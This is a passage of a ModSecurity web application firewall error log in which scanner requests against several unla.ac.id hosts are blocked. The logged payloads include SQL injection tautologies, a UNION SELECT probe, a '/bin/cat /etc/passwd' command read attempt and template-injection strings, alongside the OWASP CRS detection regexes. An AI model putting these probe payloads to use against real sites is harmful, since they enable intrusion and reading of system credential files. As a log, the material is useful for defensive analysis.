ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5435' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JMCo-f0AAASBXRoAAAAM"]
[Tue Aug 29 11:33:40.301170 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'MwLj'='MwLj found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5435' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JMCo-f0AAARy-xMAAAAb"]
[Tue Aug 29 11:33:40.381487 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '5434'='5434 found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5434' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JMCo-f0AAARjjPgAAAAL"]
[Tue Aug 29 11:33:40.386580 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ZO11JMCo-f0AAAQKOnoAAAAs"]
[Tue Aug 29 11:33:40.404111 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ZO11JMCo-f0AAARtAAUAAAAV"]
[Tue Aug 29 11:33:40.406932 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: YHLbGR%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11JMCo-f0AAAQKOnsAAAAs"]
[Tue Aug 29 11:33:40.421255 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: YHLbGR%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11JMCo-f0AAARjjPoAAAAL"]
[Tue Aug 29 11:33:40.452943 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %\\xe9\\x8c\\xa6'  found within ARGS:query: aa%\\xe9\\x8c\\xa6' union select 1,md5(999999999),3#'"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/plus/ajax_common.php"] [unique_id "ZO11JMCo-f0AAARy-xoAAAAb"]
[Tue Aug 29 11:33:40.458715 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/test.cgi"] [unique_id "ZO11JMCo-f0AAARv7UwAAAAY"]
[Tue Aug 29 11:33:40.464164 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/test.cgi"] [unique_id "ZO11JMCo-f0AAARtAAgAAAAV"]
[Tue Aug 29 11:33:40.467406 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/test.cgi"] [unique_id "ZO11JMCo-f0AAARo82QAAAAT"]
[Tue Aug 29 11:33:41.303271 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %\\xe9\\x8c\\xa6'  found within ARGS:query: aa%\\xe9\\x8c\\xa6' union select 1,md5(999999999),3#'"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plus/ajax_common.php"] [unique_id "ZO11JcCo-f0AAARo82UAAAAT"]
[Tue Aug 29 11:33:41.305361 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %\\xe9\\x8c\\xa6'  found within ARGS:query: aa%\\xe9\\x8c\\xa6' union select 1,md5(999999999),3#'"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/plus/ajax_common.php"] [unique_id "ZO11JcCo-f0AAARtAAkAAAAV"]
[Tue Aug 29 11:33:41.316014 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %\\xe9\\x8c\\xa6'  found within ARGS:query: aa%\\xe9\\x8c\\xa6' union select 1,md5(999999999),3#'"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/plus/ajax_common.php"] [unique_id "ZO11JcCo-f0AAAR@KHAAAAAF"]
[Tue Aug 29 11:33:41.328954 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %\\xe9\\x8c\\xa6'  found within ARGS:query: aa%\\xe9\\x8c\\xa6' union select 1,md5(999999999),3#'"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/plus/ajax_common.php"] [unique_id "ZO11JcCo-f0AAAQKOoAAAAAs"]
[Tue Aug 29 11:33:41.346489 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/test.cgi"] [unique_id "ZO11JcCo-f0AAARv7VAAAAAY"]
[Tue Aug 29 11:33:41.347630 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/test.cgi"] [unique_id "ZO11JcCo-f0AAARo82cAAAAT"]
[Tue Aug 29 11:33:41.427769 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '5434'='5434 found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5434' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JcCo-f0AAARQ4BEAAAAB"]
[Tue Aug 29 11:33:41.427859 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '5434'='5434 found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5434' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JcCo-f0AAARy-yIAAAAb"]
[Tue Aug 29 11:33:41.430950 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'MwLj'='MwLj found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5435' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JcCo-f0AAAR@KHUAAAAF"]
[Tue Aug 29 11:33:41.444114 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '5434'='5434 found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5434' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JcCo-f0AAANsAj4AAAAD"]
[Tue Aug 29 11:33:41.447800 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '5434'='5434 found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5434' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JcCo-f0AAARy-yMAAAAb"]
[Tue Aug 29 11:33:41.460919 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %\\xe9\\x8c\\xa6'  found within ARGS:query: aa%\\xe9\\x8c\\xa6' union select 1,md5(999999999),3#'"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/plus/ajax_common.php"] [unique_id "ZO11JcCo-f0AAASBXSQAAAAM"]
[Tue Aug 29 11:33:42.297333 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/debug.cgi"] [unique_id "ZO11JsCo-f0AAARo82wAAAAT"]
[Tue Aug 29 11:33:42.315495 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/debug.cgi"] [unique_id "ZO11JsCo-f0AAARQ4BUAAAAB"]
[Tue Aug 29 11:33:42.317959 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '5434'='5434 found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5434' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JsCo-f0AAARy-yUAAAAb"]
[Tue Aug 29 11:33:42.328287 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/debug.cgi"] [unique_id 